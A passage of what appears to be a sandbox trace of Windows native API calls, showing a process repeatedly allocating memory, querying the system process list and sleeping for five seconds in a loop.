AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.829] 